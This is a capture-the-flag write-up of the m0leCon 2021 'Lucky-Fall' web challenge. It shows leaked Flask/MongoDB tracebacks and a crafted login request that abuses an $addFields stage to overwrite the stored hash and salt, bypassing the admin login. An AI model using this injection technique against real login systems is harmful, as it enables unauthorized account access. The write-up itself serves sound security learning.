CTFtime.org

Lucky-Fall

by JaGoTu / WreckTheLine

Tags: addfields nosql 

Rating:

[Link to original writeup](https://wrecktheline.com/writeups/m0lecon-2021/#lucky_fall)

# Lucky-Fall (95 solves, 76 points)
by JaGoTu

```
Are you a lucky user?

Author: 0000matteo0000
```

We are given a link to a website that shows a funny "lucky user" and has a login box.

![Website screenshot](https://wrecktheline.com/writeups/m0lecon-2021/lucky_fall.png)

_WreckTangle? Is that predicting another team merge?!_

The login requests looks like this:
```
POST /login HTTP/1.1
Host: lucky-fall.challs.m0lecon.it
Content-Length: 31
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/json
Origin: http://lucky-fall.challs.m0lecon.it
Referer: http://lucky-fall.challs.m0lecon.it/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"name":"abc","password":"def"}
```

Luckily, the server has detailed exceptions enabled, so we can leak bits of the source code.

Posting `{}`:
```python
Traceback (most recent call last):
File "/home/appuser/mongo_in/flask/server.py", line 38, in login
user = users.aggregate([{"$match": {"user": request.json["name"]}}, {"$addFields": request.json}]).next()
KeyError: 'name'
```

Posting `{"name":"admin"}`:
```python
Traceback (most recent call last):
File "/home/appuser/mongo_in/flask/server.py", line 39, in login
if hashlib.sha256((user["password"] + user["salt"]).encode("UTF-8")).hexdigest() == user["hash"]:
KeyError: 'password'
```

The `$addfields` is very suspicious, it means that we find (`match`) a user with the provided name and then merge the fields of this item with all items from the `request.json`. That means that we can simply ovewrite the `salt` and `hash` values:

```
POST /login HTTP/1.1
Host: lucky-fall.challs.m0lecon.it
Content-Length: 127
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/json
Origin: http://lucky-fall.challs.m0lecon.it
Referer: http://lucky-fall.challs.m0lecon.it/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{
"name":"admin",
"hash":"eb44e5c1ed8fef20aa3af1a1d737cc4094a31823d087ccb5d681ab96b6e2ff3e",
"salt":"",
"password":"kekeke"
}
```

```
HTTP/1.1 200 OK
Content-Length: 45
Content-Type: text/html; charset=utf-8
Date: Fri, 14 May 2021 17:20:50 GMT
Server: gunicorn
Connection: close

ptm{it_is_nice_to_have_objects_as_parameters}
```

Original writeup (https://wrecktheline.com/writeups/m0lecon-2021/#lucky_fall).

Comments